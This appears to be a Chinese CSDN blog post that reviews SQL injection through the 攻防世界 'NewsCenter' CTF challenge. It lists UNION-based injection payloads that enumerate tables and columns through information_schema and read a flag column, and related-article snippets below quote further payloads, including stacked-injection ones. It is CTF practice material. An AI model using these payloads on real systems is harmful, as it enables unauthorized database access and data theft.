SQL注入复习 -攻防世界web【NewsCenter】

最新推荐文章于 2024-05-10 21:16:18 发布
最新推荐文章于 2024-05-10 21:16:18 发布
阅读量189 收藏
点赞数 1
分类专栏: CTF-web 文章标签: SQL注入 联合查询 数据库安全 信息泄露 flag
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/124255730
版权

sql注入语句复习

' and 0 union select 1,2,3#
初步判断该sql查询返回三列数据.

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到表名,很明显我们需要得到 secret_table 表中的内容

' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#
' and 0 union select 1,2,group_concat(column_name,data_type) from information_schema.columns where table_name='secret_table' #

得到 secret_table 表的列名以及数据类型  id(int)、fl4g(varchar)


' and 0 union select 1,2,fl4g from secret_table#
得到flag

 1、联合查询字段

 2、爆库名

 3、爆列名

4、拿flag

 

 

 

菜菜zhao
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】攻防世界 supersqli 解题详析
等风来
05-27 3370
堆叠注入(stacked injection)是一种SQL注入攻击的技术手段,它会在同一行代码中多次使用已知的SQL注入漏洞,从而达到绕过安全措施、执行恶意代码和窃取数据库信息等目的。堆叠注入攻击利用了SQL语句的连贯性,通过在查询语句中嵌入多个SELECT语句或在UPDATE语句中嵌入多个SET赋值的情况来强行插入额外的恶意代码段。表示注释掉其后面的内容,因此程序会执行两次SQL语句,并忽略掉密码的条件,最终返回敏感数据的行数,从而达到了窃取数据库敏感信息的目的。断开原有语句,再插入新的SQL语句。
攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 262
攻防世界 WEB NewsCenter NewsCenter:   题目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
攻防世界 sql注入
weixin_63231007的博客
03-20 1801
攻防世界supersql 首先添加一个单引号1' --+发现出错。 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 使用order by可知表由2个字段: error 1054 : Unknown column '3' i
攻防世界NewsCenterSQL注入解题方法
weixin_43923736的博客
06-20 977
攻防世界NewsCenter】解题方法
XCTF攻防世界-NewsCenter-SQL简单注入-sqlmap注入
MJosek博客
03-23 1210
题目地址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4686&page=1 我们进入页面 观察界面我们考虑到是sql注入 这里我们演示的是sqlmap的注入方法 首先我们页面的post请求进行抓包操作 ...
攻防世界-Web-supersqli
uh_eng的博客
08-14 335
本题涉及到了堆叠注入、MySQL预编译 0x01 SQL注入的题目,按照流程来验证SQL注入漏洞。 首先输入1' and '1'='1发现正常输出,然后输入1' and '1'='2发现没有输出,进一步尝试联合注入,输入1' union select 1 #结果返回了 return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 可见后端过滤掉了一些SQL关键字,显然不能直接通过这些关键字进行注入。 0x02 尝试使用
攻防世界-NewsCenter
weixin_46784800的博客
11-12 1498
攻防世界-NewsCenter题 首先,进入靶场网站,发现是一个News界面,并且界面存在一个搜索入口,此时的第一感觉就是,这道题应该是一道sql注入的题目(后来发现确实是这样) 在搜索框输入一系列数字或字母进行搜索,可搜索出来一些News: 打开HackBar,在POST请求值处的字符串末尾输入单引号,尝试是否能发生单引号闭合: 发现请求的返回值为500,则说明该请求在服务器的数据库中发生了单引号闭合,导致数据库查询失败,这时已经可以实锤本题为数据库注入的题目了。 首先,通过order语句,判断查询
攻防世界】八 --- NewsCenter
qq_43168364的博客
12-23 390
题目 — NewsCenter 一、writeup 主页一个search输入框,我们来测试sql注入漏洞 输入单引号,回显 500 ,大概率是一个字符型注入点 字段数:3 显示位:2,3 库名:news,用户名:user@10.42.101.146 表名:news, secret_table secret_table表字段名:id,fl4g 读数据,的flag 二、知识点 sql注入 ......
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界 newscenter
09-08
攻防世界NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
攻防世界-web-supersqli
wuh2333的博客
06-07 941
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
yuanxu8877的博客
11-28 829
攻防世界supersqli-强网杯随便注(堆叠注入顶级练手题目)
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)
Onlyone_1314的博客
11-27 2052
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
攻防世界web进阶区——NewsCentersql注入
一枚菜鸡
10-22 576
一、基本思路 打开网页后,出现搜索框。确认为sql注入类型。 构造 : ’ and 0 union select 1,2,3 # ’ 闭合数据库查询语句的 ’ , # 注释掉后者。 回显出,2,3字段。证明查询语句返回的数据回显字段为第二个和第三个。再次构造 ’ and 0 union select 1,table_schema,table_name from information_schema.columns # ...
XCTF-攻防世界CTF平台-Web类——7、NewsCenterSQL注入
Onlyone_1314的博客
11-19 1827
目录标题手工注入information_schema.columns 学习sqlmap工具注入: 打开题目地址: 只有一个搜索框,下面是几条消息,上面输入关键词可以搜索这几条消息,可能就是存在SQL注入漏洞: 在后面加入’ or '1 = 1恒成立的判定条件: a ' or '1 = 1 搜索结果变成了所有的消息,应该就是存在SQL注入 手工注入 之后我们在后面拼接order by,来查看表中有多少列,查询结果按照前1列排序(第一个’闭合后台命令的第一个’,#注释掉后台的第二个’): ' order
攻防世界-web supersqli
m0_48108919的博客
02-10 475
根据题目这是一道sql注入题 输入1'测试,成功报错 可以看到这是一个MariaDB数据库,MariaDB是MySQL的一个分支,与mysql大部分的用法都是一样的,只有一些参数,特性的不同 1.使用order by来测试字段 1' order by n # 当order by 2显示正常,当order by 3报错,可以确定有两个字段 2.使用联合查询 1' union select 1,2 # 提示对select等操作词语进行了正则过滤,尝试使用双写、/**/绕过无效 ...
攻防世界(CTF)~web-supersqli(详细解题思路)
最新发布
m0_75030189的博客
05-10 1000
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理
bind mysql web_Bind-DLZ + Flask + Mysql DNS管理平台
weixin_34999698的博客
01-26 196
Bind-DLZ + Flask + Mysql DNS管理平台系统环境:CentOS 6.5 X64软件版本:bind-9.9.5.tar.gzmysql-5.6.16.tar.gz项目地址:https://github.com/1032231418/Bind-Web描述: 数据库安装就不在絮叨,了解运维的同学都应该知道一.源码安装配置Bind:1.源码编译安装tar-zxvfbind-...
攻防世界inget(sqlmap方法)
2302_78972359的博客
05-05 852
加上id,--dbs是用来爆数据库的,查看当前数据使用的数据库,中间可能会有提示,输入y即可。确实是sql注入,我用的是sqlmap,也可以在url构造,与sqlmap同理。这里我们查看第一个数据库cyber,输入指令,可以查看cyber库下的表名。可以看到cyber库下就一个表,也叫cyber,输入指令查看表内字段。cyber表内有三个字段,首先怀疑这个pw,查看字段内容,输入指令。打开虚拟机,终端输入sqlmap,如果是以下页面则说明可用。这个id是我们测试的参数,如果没这个id的话会像这样报错。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值